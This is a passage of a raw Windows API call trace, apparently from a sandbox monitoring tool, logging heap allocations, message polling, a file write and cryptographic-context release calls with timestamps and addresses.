HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24e2c48 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d4648 | out: hHeap=0x25c0000) returned 1 [0256.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0256.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c0850 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0256.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c6048 | out: hHeap=0x25c0000) returned 1 [0256.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0256.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0256.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe5f8) returned 0x34b2250 [0256.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34cee50 | out: hHeap=0x25c0000) returned 1 [0256.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.656] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.657] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.657] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.658] WriteFile (in: hFile=0x1f8, lpBuffer=0x34c0850*, nNumberOfBytesToWrite=0xe5f8, lpNumberOfBytesWritten=0x8bf5ec, lpOverlapped=0x0 | out: lpBuffer=0x34c0850*, lpNumberOfBytesWritten=0x8bf5ec*=0xe5f8, lpOverlapped=0x0) returned 1 [0256.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c0850 | out: hHeap=0x25c0000) returned 1 [0256.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.659] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0256.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.660] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.660] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0256.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0256.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.660] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.661] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0256.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.661] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.661] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.661] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.662] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.662] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.662] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.662] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.662] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.663] CryptDestroyKey (hKey=0xaa5860) returned 1 [0256.663] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.663] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.663] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.663] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.663] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.663] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.663] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.663] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.663] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.663] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.663] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.663] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.663] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.663] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.663] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.664] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.664] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.664] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.664] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.664] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.664] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.664] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.664] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.664] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.664] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.664] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.664] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.664] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.664] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.664] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.664] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.665] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.665] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.665] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.665] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.665] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.665] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.665] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.665] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.665] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.665] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.665] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.665] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.665] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.665] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.665] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.665] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.666] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.666] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.666] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.666] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.666] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.666] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.666] CryptReleaseContext (hProv=0xad2698, dwFlags=0x0) returned 1 [0256.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0256.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0256.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.666] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, 